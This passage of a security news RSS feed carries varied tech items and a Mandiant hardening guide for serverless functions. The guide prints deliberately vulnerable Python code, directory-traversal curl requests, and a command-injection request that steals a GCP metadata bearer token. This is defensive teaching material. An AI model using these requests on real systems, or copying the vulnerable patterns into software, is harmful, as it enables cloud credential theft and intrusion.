<li>Fixed background session titles in the agents view showing the naming model's refusal text when the prompt contains a link</li>
<li>Fixed background agents killed by the user auto-respawning, and revived agents re-running stale prompts from old sessions</li>
<li>Fixed routines with no schedule reporting a next run time in the year 1</li>
<li>Hardened synced skill/plugin directory naming on Windows and kept CCR web fetch/search proxies working after <code>/clear</code></li>
<li>Improved terminal layout and rendering performance</li>
<li>Improved background agent result reporting — Claude now reports the status of still-running agents and waits for the real completion instead of fabricating results</li>
<li>Improved the memory index over-limit warning to measure only loaded content, excluding frontmatter and HTML comments</li>
<li>Updated integer environment variables (timeouts, token budgets, retry counts) to accept scientific notation and digit-separator spellings like <code>1e6</code> and <code>64_000</code></li>
<li>Updated documentation links to the current docs sites</li>
<li>Changed "always allow" permission rules to save at the repository root, so approvals granted in a git worktree persist across sessions and worktrees</li>
<li>Changed <code>/usage-credits</code> to ask for confirmation before sending a request to organization admins</li>
<li>Changed Vim mode <code>s</code> and <code>S</code> (substitute char/line) to work in NORMAL mode, matching vim behavior</li>
<li>[VSCode] Updated the Remote Control banner to describe what it does</li>
<li>Claude in Chrome: hardened file-upload path validation</li>
<li>Claude in Chrome: <code>save_to_disk</code> on screenshot actions now writes the image to disk and returns the path; previously it did nothing</li>
<li>Fixed a prompt-caching regression on Bedrock, Vertex, Mantle, and Foundry that billed the trailing system context block as fresh input tokens on every request.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google and Epic Cancel Settlement; Third-Party App Stores Coming To Google Play]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Big changes are coming to Android apps, but they're not the changes Google wanted. The settlement between Google and Epic that aimed to put to rest the companies' long-running antitrust battle is being withdrawn, and that means third-party ap...]]></description>
<link>https://tsecurity.de/de/3671690/it-security-nachrichten/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671690/it-security-nachrichten/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play/</guid>
<pubDate>Wed, 15 Jul 2026 21:09:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Big changes are coming to Android apps, but they're not the changes Google wanted. The settlement between Google and Epic that aimed to put to rest the companies' long-running antitrust battle is being withdrawn, and that means third-party app stores are coming to the Play Store. Google has confirmed that it will begin distributing rival app stores next week, setting the stage for competing platforms to take a bite out of Google's Android revenue stream. [...] Google and Epic were set to return to court on July 16 to argue in favor of the settlement. However, the writing may have been on the wall. In a recent expert analysis provided to the court, MIT economics professor Nancy Rose noted that the settlement was "unlikely to enable Google Play's potential competitors to overcome their long-standing network-effect disadvantage in a timely manner."
 
With settlement approval looking increasingly unlikely, Epic and Google agreed this week to call the whole thing off. Here's how Google Trust and Reputation Communications Lead Dan Jackson explains the company's decision: "We've agreed with Epic to withdraw our motion to modify the US Court's injunction rather than prolonging this process which creates uncertainty for the ecosystem. This allows us to focus on executing our recently announced global business model evolution to deliver greater app store choice, lower prices, and more opportunities for developers and users. We remain committed to maintaining Android's industry-leading security and fostering a competitive ecosystem where every app store and developer has the freedom to compete. In parallel, we continue to comply with the US Court's injunction."
 
In a brief filing (PDF), Google's legal team informs the court that Google is prepared to begin distributing third-party app stores in Google Play on July 22. Under the terms of Judge Donato's original injunction, these stores will have access to the full catalog of Google Play apps by default. Developers will have the option to opt out of distribution in these stores, and Google has a support page explaining how to do so. Google also has documentation on how app stores can get access to the Google Play catalog. It won't be mirroring those apps in any shady storefront that asks. The court has allowed Google to charge reasonable fees to cover its security and compliance review of third-party stores, which will be $5,000 per year.
 
Google will also require approved stores to block malware, respect intellectual property, and include mechanisms to update and uninstall apps. App stores can be removed from the program if more than 1 percent of attempted app installs appear to be malware or unwanted software. It's unclear if there will be separate, possibly more stringent requirements for storefront distribution in the Play Store. However, Google is prohibited from unreasonably blocking third-party store clients uploaded to Google Play. The changes Google has announced under the Epic agreement will proceed for now. That means Registered App Stores will happen globally, but they will probably only appear in the Play Store for US users. Google hasn't specified if there will be any differences in the features available to the stores downloaded from Play versus registered stores.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Google+and+Epic+Cancel+Settlement%3B+Third-Party+App+Stores+Coming+To+Google+Play%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F15%2F1738217%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F15%2F1738217%2Fgoogle-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/15/1738217/google-and-epic-cancel-settlement-third-party-app-stores-coming-to-google-play?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse Shared Claude Chats and Google Ads to Deploy MacSync Stealer on macOS]]></title>
<description><![CDATA[Threat actors are hijacking Anthropic’s Claude AI platform and Google Ads to trick Mac users into infecting themselves with a dangerous new information-stealing malware called MacSync Stealer, according to Zscaler Threat Hunting. The infection begins when a victim searches for…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3671624/it-security-nachrichten/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671624/it-security-nachrichten/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/</guid>
<pubDate>Wed, 15 Jul 2026 20:37:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Threat actors are hijacking Anthropic’s Claude AI platform and Google Ads to trick Mac users into infecting themselves with a dangerous new information-stealing malware called MacSync Stealer, according to Zscaler Threat Hunting. The infection begins when a victim searches for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/">Hackers Abuse Shared Claude Chats and Google Ads to Deploy MacSync Stealer on macOS</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One Layer Is Enough: Adapting Pretrained Visual Encoders for Image Generation]]></title>
<description><![CDATA[Visual generative models (e.g., diffusion models) typically operate in compressed latent spaces to balance training efficiency and sample quality. In parallel, there has been growing interest in leveraging high-quality pre-trained visual representations—either by aligning them inside VAEs or dire...]]></description>
<link>https://tsecurity.de/de/3671517/ai-nachrichten/one-layer-is-enough-adapting-pretrained-visual-encoders-for-image-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671517/ai-nachrichten/one-layer-is-enough-adapting-pretrained-visual-encoders-for-image-generation/</guid>
<pubDate>Wed, 15 Jul 2026 19:34:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Visual generative models (e.g., diffusion models) typically operate in compressed latent spaces to balance training efficiency and sample quality. In parallel, there has been growing interest in leveraging high-quality pre-trained visual representations—either by aligning them inside VAEs or directly within the generative model. However, adapting such representations remains challenging due to fundamental mismatches between understanding-oriented features and generation-friendly latent spaces. Representation encoders benefit from high-dimensional latents that capture diverse hypotheses for…]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse Shared Claude Chats and Google Ads to Deploy MacSync Stealer on macOS]]></title>
<description><![CDATA[Threat actors are hijacking Anthropic’s Claude AI platform and Google Ads to trick Mac users into infecting themselves with a dangerous new information-stealing malware called MacSync Stealer, according to Zscaler Threat Hunting. The infection begins when a victim searches for terms like “claude ...]]></description>
<link>https://tsecurity.de/de/3671456/it-security-nachrichten/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671456/it-security-nachrichten/hackers-abuse-shared-claude-chats-and-google-ads-to-deploy-macsync-stealer-on-macos/</guid>
<pubDate>Wed, 15 Jul 2026 19:23:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Threat actors are hijacking Anthropic’s Claude AI platform and Google Ads to trick Mac users into infecting themselves with a dangerous new information-stealing malware called MacSync Stealer, according to Zscaler Threat Hunting. The infection begins when a victim searches for terms like “claude download” or “claude mac” and clicks a paid Google ad that redirects […]</p>
<p>The post <a href="https://cybersecuritynews.com/shared-claude-chats-macsync-stealer/">Hackers Abuse Shared Claude Chats and Google Ads to Deploy MacSync Stealer on macOS</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Studio Quail 2 mit parallelen Agentenchats und LeakCanary-Integration]]></title>
<description><![CDATA[Googles offizielle IDE für die Entwicklung von Android-Apps setzt verstärkt auf KI-Integration, unter anderem mit mehreren parallel laufenden Agentenchats.]]></description>
<link>https://tsecurity.de/de/3671262/it-nachrichten/android-studio-quail-2-mit-parallelen-agentenchats-und-leakcanary-integration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671262/it-nachrichten/android-studio-quail-2-mit-parallelen-agentenchats-und-leakcanary-integration/</guid>
<pubDate>Wed, 15 Jul 2026 18:04:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Googles offizielle IDE für die Entwicklung von Android-Apps setzt verstärkt auf KI-Integration, unter anderem mit mehreren parallel laufenden Agentenchats.]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code backs multi-chat Claude sessions]]></title>
<description><![CDATA[Visual Studio Code 1.128, the most recent edition of Microsoft’s code editor, adds support for multi-chat agent sessions using Anthropic Claude agents. 



Introduced July 8, VS Code 1.28 can be downloaded for Windows, Linux, or Mac from code.visualstudio.com.



With VS Code 1.28, multi-chat age...]]></description>
<link>https://tsecurity.de/de/3671161/ai-nachrichten/visual-studio-code-backs-multi-chat-claude-sessions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671161/ai-nachrichten/visual-studio-code-backs-multi-chat-claude-sessions/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Visual Studio Code 1.128, the most recent edition of <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Microsoft’s code editor</a>, adds support for multi-chat agent sessions using Anthropic Claude agents. </p>



<p class="wp-block-paragraph">Introduced July 8, VS Code 1.28 can be downloaded for Windows, Linux, or Mac from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a>.</p>



<p class="wp-block-paragraph">With VS Code 1.28, multi-chat agent sessions now support using Anthropic Claude agents. With multiple chats, a session can contain related chats, allowing users to compare approaches, branch from an earlier turn, and run work in parallel. Users can add chats, fork a chat from an existing turn, switch between peer chats, and send turns concurrently. Each chat keeps its own history, title, and model selection, and restores with the parent session after restart, Microsoft said.</p>



<p class="wp-block-paragraph">VS Code 1.28 also makes Copilot Vision generally available. With Copilot Vision, VS Code users can attach images and PDFs by pasting them into chat, dragging and dropping them, or using the context menu. Images also may be read by the agent via a tool call, Microsoft said. </p>



<p class="wp-block-paragraph">Also in VS Code 1.28:</p>



<ul class="wp-block-list">
<li>Quick chats allow users to ask a question in the Agents window without opening a workspace first.</li>



<li>VS Code can contribute OS-level keyboard shortcuts that take effect even if VS Code is not in focus. Users can add <code>systemWide</code> to a keybinding definition in <code>keybindings.json</code> to make it OS-level.</li>



<li>Developers can configure a location for browser tabs to open via a new setting, <code>workbench.browser.newTabPlacement</code>. The setting provides three options: to open browser tabs in the active editor group, in a dedicated group to the side, or in a dedicated auxiliary window. </li>



<li>VS Code can contribute OS-level keyboard shortcuts. These shortcuts take effect even if VS Code is not in focus. </li>



<li>Administrators can configure where GitHub Copilot sends <a href="https://opentelemetry.io/" target="_blank" rel="noreferrer noopener">OpenTelemetry</a> (OTel) data, allowing organizations to enforce telemetry flows to an approved collector without each developer setting <code>OTEL_*</code> environment variables. The managed configuration applies to both the Copilot Chat extension and the agent host process.</li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From story points to tokenmaxxing: Why engineering keeps measuring the wrong things]]></title>
<description><![CDATA[For decades, software engineering has been plagued by “productivity theater.” Every few years, the industry aligns around a new vanity metric — usually one that latches onto whatever technology happens to be in vogue at the time. For a discipline rooted in creativity and problem-solving, this is ...]]></description>
<link>https://tsecurity.de/de/3671158/ai-nachrichten/from-story-points-to-tokenmaxxing-why-engineering-keeps-measuring-the-wrong-things/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671158/ai-nachrichten/from-story-points-to-tokenmaxxing-why-engineering-keeps-measuring-the-wrong-things/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For decades, software engineering has been plagued by “productivity theater.” Every few years, the industry aligns around a new vanity metric — usually one that latches onto whatever technology happens to be in vogue at the time. For a discipline rooted in creativity and problem-solving, this is a poor way to demonstrate progress. Yet, we find ourselves in this position once again. The pattern is often the same: reach for something we can easily count, and in doing so, lose sight of what we are actually trying to achieve.</p>



<h2 class="wp-block-heading">Quantity over quality: the wrong measurement, every time</h2>



<p class="wp-block-paragraph">I recall when I was coming up as a software engineer in the 1990s, a small number of companies took up the practice of paying their engineers by each line of code. This may have been productivity theater at its worst, leading to negative incentives, inefficient processes, and just generally bad engineering. Developers were rewarded for writing far more code than the problems they were facing required — classic “quantity over quality” — and the result was bloated, brittle codebases that were all but impossible to maintain. The goal — to create reliable software that solved real user problems — got buried under the incentive to produce.</p>



<p class="wp-block-paragraph">Then in the 2000s, <a href="https://www.atlassian.com/agile/project-management/estimation" data-type="link" data-id="https://www.atlassian.com/agile/project-management/estimation">the rise of Agile brought us story points</a>, an abstract way to estimate task complexity, effort, and risk relative to other work. Rather than answering “How long will this take?,” story points were meant to answer, “How big is this compared to what we’ve done before?” This approach sounds good in theory, but in practice, some development teams learned to game the system by inflating estimates, over-engineering solutions to look productive, and losing sight of whether the work they produced actually created value. Once again, the metric became the goal, and the actual goal — delivering outcomes that mattered to the business — became secondary.</p>



<p class="wp-block-paragraph">Every one of these metrics failed for the same reason: they measured effort instead of value.</p>



<h2 class="wp-block-heading">Quantity in the age of AI</h2>



<p class="wp-block-paragraph">Today, “<a href="https://www.infoworld.com/article/4183060/the-tokenmaxxing-backlash-is-coming.html">tokenmaxxing</a>,” a trend in which developers and teams optimize for <a href="https://www.infoworld.com/article/4170173/tokenmaxxing-is-super-dumb.html" data-type="link" data-id="https://www.infoworld.com/article/4170173/tokenmaxxing-is-super-dumb.html">consuming as many AI model tokens as possible</a>, treats raw consumption as an equivalent for output. As I see it, this is the latest flawed productivity metric to make its way into the world of software engineering. Tokenmaxxing is nothing more than another vanity metric, and is just as useless as using “lines of code” or inflated “story points” as a benchmark.</p>



<p class="wp-block-paragraph">Tokenmaxxing is the result of a few different behaviors, including:</p>



<ul class="wp-block-list">
<li>Prompt flooding: stuffing massive codebases, documentation, and context into every prompt, burning tokens on context the model doesn’t actually need.</li>



<li>Agent swarms: running multiple AI agents in parallel to maximize code output, regardless of whether the work is coordinated or coherent.</li>



<li>Background loops: keeping AI sessions or agents running continuously in the background, racking up token spend without clear ownership of what is being produced — or why.</li>
</ul>



<p class="wp-block-paragraph"><br>Now, it is no secret that AI is reshaping how software is developed, and these behaviors are the result of that reshaping. Providing AI with codebases, running multiple agents at once, and even relying on coding assistants for help all have their uses. But when we lose control of the changes we are making and why we are making them, we find ourselves facing a new version of the same old problem: measuring engineering productivity with the wrong metrics.</p>



<p class="wp-block-paragraph">A more useful question to ask isn’t, “How many tokens did we spend?” but rather, “What problem did we actually solve, and for whom?”</p>



<h2 class="wp-block-heading">Spending resources without goals</h2>



<p class="wp-block-paragraph">Yes, AI is giving software engineers the ability to do more with less, to move quickly, and to experiment in ways that were previously out of reach. But leaning on AI to <em>perform</em> productivity, rather than <em>deliver</em> it, is a trap that will cost us in code quality, team capability, and business credibility.</p>



<p class="wp-block-paragraph">As a CTO, I am all for experimenting with AI. I want to use it to make our programs better, stronger, and future-proof. What I don’t want is for it to drive us toward excess while leaving us with little to show for it.</p>



<p class="wp-block-paragraph">The test I keep coming back to is simple: does this AI-generated output help us ship something that matters? Does it reduce friction for a user, close a gap in a workflow, or improve reliability for a customer? If the answer isn’t clear, then we are spending resources — both human and computational — without a defined goal. And that is not engineering. That is activity.</p>



<h2 class="wp-block-heading">Spec-driven development: where value gets defined</h2>



<p class="wp-block-paragraph">It is time to adopt newer approaches like <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html" data-type="link" data-id="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">spec-driven development</a>, a method where engineers write detailed specifications first and AI generates code against them. Rather than relying on prompt flooding and agent swarms and hoping AI produces the best result, we need to shift toward defining requirements, reviewing AI-generated output, and orchestrating systems with intent.</p>



<p class="wp-block-paragraph">But spec-driven development is <a href="https://www.augmentcode.com/guides/what-is-spec-driven-development" data-type="link" data-id="https://www.augmentcode.com/guides/what-is-spec-driven-development">more than a methodology</a>. It is the place where engineering intent and business value get defined together. The spec is where you answer, “Why does this matter, and what problem are we solving?” before a single token gets spent.</p>



<p class="wp-block-paragraph">Software engineers have long taken pride in writing elegant code, and I would hate to see AI cheapen that pride rather than elevate it. In an AI-first world, the craft shouldn’t disappear; it should simply move upstream. The spec is where elegance lives now, and it deserves the same attention to detail we once reserved for the code itself.</p>



<p class="wp-block-paragraph">At its core, software engineering is about defining, analyzing, and resolving technical challenges. If we are willingly giving all of that up to AI, we will lose the integrity of our discipline and the ability to prove our value. Using the maximum number of tokens to produce code isn’t impressive. Using a well-crafted, intentional prompt to solve a specific problem? That’s the work worth celebrating.</p>



<h2 class="wp-block-heading">Stop performing productivity and start delivering it</h2>



<p class="wp-block-paragraph">We are at an inflection point. Many organizations are defaulting to activity-based metrics, measuring how much AI is being used rather than whether it is improving delivery, product quality, or business outcomes.</p>



<p class="wp-block-paragraph">The question worth asking is not, “How much AI did we use this sprint?” It is “What value did we deliver for our users, our team, or our business?” Was it the ability to resolve a critical bug more quickly? Reduced cycle time on a high-value feature? A customer workflow that now takes minutes instead of hours? Those are outcomes. Those are the things worth measuring.</p>



<p class="wp-block-paragraph">AI can help us deliver meaningful outcomes faster, but only if we use it with the same rigor and intent we expect from every other engineering or business decision. Don’t let it become another form of productivity theater. The most successful engineering organizations in the age of AI won’t be the ones that consumed the most tokens, they’ll be the organizations that never lost sight of why they were building in the first place.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russische Hacker FSB Center 16: Warnung vor Angriffen auf kritische Infrastruktur]]></title>
<description><![CDATA[US-Behörden warnen vor russischer Hackergruppe FSB Center 16. Parallel dazu veröffentlichte die Bande World Leaks Baupläne eines indischen AKW.]]></description>
<link>https://tsecurity.de/de/3671102/hacking/russische-hacker-fsb-center-16-warnung-vor-angriffen-auf-kritische-infrastruktur/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671102/hacking/russische-hacker-fsb-center-16-warnung-vor-angriffen-auf-kritische-infrastruktur/</guid>
<pubDate>Wed, 15 Jul 2026 17:07:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[US-Behörden warnen vor russischer Hackergruppe FSB Center 16. Parallel dazu veröffentlichte die Bande World Leaks Baupläne eines indischen AKW.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Risk of Exposed Cloud Functions and How to Harden]]></title>
<description><![CDATA[Written by: Corné de Jong

Introduction 
Mandiant security assessments frequently identify publicly exposed serverless applications that lack authentication, often as a result of specific business requirements. Serverless deployments typically run custom-developed code that incorporates third-par...]]></description>
<link>https://tsecurity.de/de/3670891/it-security-nachrichten/the-risk-of-exposed-cloud-functions-and-how-to-harden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670891/it-security-nachrichten/the-risk-of-exposed-cloud-functions-and-how-to-harden/</guid>
<pubDate>Wed, 15 Jul 2026 16:08:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Corné de Jong</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Mandiant security assessments frequently identify publicly exposed serverless applications that lack authentication, often as a result of specific business requirements. Serverless deployments typically run custom-developed code that incorporates third-party packages, making them targets for a wide range of application-level attacks, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Local and Remote File Inclusion (LFI/RFI)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Command Injection</span></p>
</li>
</ul>
<p><span>Successful exploitation of these vulnerabilities can grant an attacker full control over the underlying container instance. Such access can serve as a foothold that may ultimately lead to a full compromise of the victim’s cloud environment.</span></p>
<p><span>Based on lessons learned in customer engagements, in this blog post we describe attack scenarios and provide actionable guidance on how to secure serverless environments. While this analysis focuses on hardening strategies for Google Cloud Run services and functions that must remain publicly accessible, these principles apply universally to any public serverless deployment.</span></p>
<h3><span>What are Serverless Applications?</span></h3>
<p><span>Serverless applications, also described as Function-as-a-Service (FaaS), allow the deployment of individual blocks of code as microservices within a flexible, decoupled, and event-driven cloud architecture without the need to manage underlying infrastructure. These services enable applications and automations to scale automatically and deploy instantly, removing operational overhead. </span><span>Serverless services underpin major e-commerce, media, payment processing applications, and AI usage.</span><span> </span></p>
<p><span>The rapid expansion of generative AI adoption is a significant driver of increased serverless architecture use. </span><span>AI workflows, including chatbot interactions, image generation, “vibe-coding”, and multi-step AI agents rely on serverless functions to complete tasks for users. </span><span>This growth has made securing serverless environments a more pressing challenge for enterprise security teams. </span></p>
<h3><span>Risks of Serverless Application Attacks</span></h3>
<p><span>Publicly exposed serverless workloads can serve as an initial access point for threat actors. As noted, these services may contain vulnerabilities within the code, imported packages, or the underlying runtime environment.</span></p>
<p><span>Once an entry point is exploited, attackers typically attempt to escalate privileges or move laterally. Common techniques observed include:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Extracting secrets stored directly within the application code.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Reviewing application logic and sensitive data to identify further attack vectors within the environment.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Exfiltrating service account bearer tokens from the metadata server following successful Remote Code Execution (RCE).</span></p>
</li>
</ul>
<p><span>Leveraging these compromised secrets or service accounts allows threat actors to pivot to adjacent systems and workloads, potentially resulting in a total environment takeover if proper hardening strategies are not in place.</span></p>
<h3><span>Example Attack Scenarios</span></h3>
<p><span>The following simplified scenarios illustrate how serverless functions can be compromised and how attackers pivot after achieving initial code execution.</span></p>
<h4><span>Local File Inclusion (LFI) </span></h4>
<p><span>In the following Cloud Run example, a Python/Flask function accepts user-controlled input to open a file without performing proper validation. This pattern is an example of a Local File Inclusion (LFI) vulnerability.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import functions_framework

@functions_framework.http
def hello_http(request):
    request_json = request.get_json(silent=True)
    request_args = request.args
    if request_json and 'file' in request_json:
        file = request_json['file']
    elif request_args and 'file' in request_args:
        file = request_args['file']
 
# VULNERABILITY: The 'file' parameter is used directly in open() 
# without validation, allowing arbitrary file access
    with open(file, 'r') as resp:
          filedata = resp.read()
    return 'local file data {}!'.format(filedata)</code></pre>
<p><span><span>Figure 1: Vulnerable Python/Flask function accepting unvalidated user input to open files</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>This vulnerability allows an attacker to request sensitive files from the Cloud Run instance by using </span><code>curl</code><span> to send a POST request via the </span><code>file</code><span> parameter:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -X POST https://cloudrun01-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d '{"file": "main.py"}'</code></pre>
<p><span><span>Figure 2: curl POST request targeting the file parameter</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The response provides the complete </span><code>main.py</code><span> source code. An attacker can analyze the code for:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Hardcoded secrets such as API keys, database credentials, or authentication tokens</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Business logic flaws and additional injection points</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Internal service endpoints and architecture details</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Import statements revealing the technology stack and potential CVE exposure</span></p>
</li>
</ul>
<p><span>Additionally, attackers can leverage standard </span><code>../</code><span> directory traversal sequences to retrieve sensitive system files:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -X POST https://cloudrun01-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d '{"file": "../../../etc/passwd"}'</code></pre>
<p><span><span>Figure 3: curl POST request leveraging directory traversal sequences</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>An LFI vulnerability allows an attacker to retrieve and fuzz various files directly from the container. Key examples include:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><code>requirements.txt, package.json, go.mod</code><span>: Used to identify installed packages and versions with known vulnerabilities.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>.</span><code>env</code><span> files: Frequently contain sensitive environment variables or hard coded secrets.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Application configuration files: </strong><span>May contain database credentials, API keys, or service endpoints if not securely managed.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>/etc/passwd, /proc/self/environ</code><span>: Contains user information, environment variables.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Application logs: </strong><span>may contain auth tokens or PII data.</span></p>
</li>
</ul>
<p><strong>Best Practice:</strong><span> Never store secrets or credentials within the source code or local container files. Utilize a dedicated secrets management solution, such as Secret Manager.</span></p>
<h4><span>Code Execution/Command Injection</span></h4>
<p><span>In the following scenario, a Python function uses shell execution methods with unsanitized user input, allowing an attacker to execute arbitrary commands.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import functions_framework
import subprocess


@functions_framework.http
def hello_http(request):
  request_json = request.get_json(silent=True)
  request_args = request.args
  if request_json and 'input' in request_json:
      input = request_json['input']
  elif request_args and 'input' in request_args:
      input = request_args['input']
  result = subprocess.run(input, shell=True,capture_output=True, text=True)
  return format(result)</code></pre>
<p><span><span>Figure 4: Python function utilizing shell execution with unsanitized user input</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>This allows an attacker to execute a subsequent curl request targeting the GCP metadata service to retrieve the service account’s bearer token. </span></p>
<p><span>The following request extracts the service account's OAuth 2.0 bearer token, which remains valid for 1 hour:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -X POST https://cloudrun02-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d "{\"input\": \"curl 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'\"}"</code></pre>
<p><span><span>Figure 5:</span><span> </span><span>Extraction of a GCP service account bearer token via a curl request</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Once obtained, an attacker can use it on an attacker-controlled system to execute Google Cloud CLI commands. For example the </span><code>CLOUDSDK_AUTH_ACCESS_TOKEN</code><span> environment variable can be set using the stolen bearer token.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>export CLOUDSDK_AUTH_ACCESS_TOKEN=”obtain bearer token”</code></pre>
<p><span><span>Figure 6: Defining CLOUDSDK_AUTH_ACCESS_TOKEN environment variable</span></span></p></div>
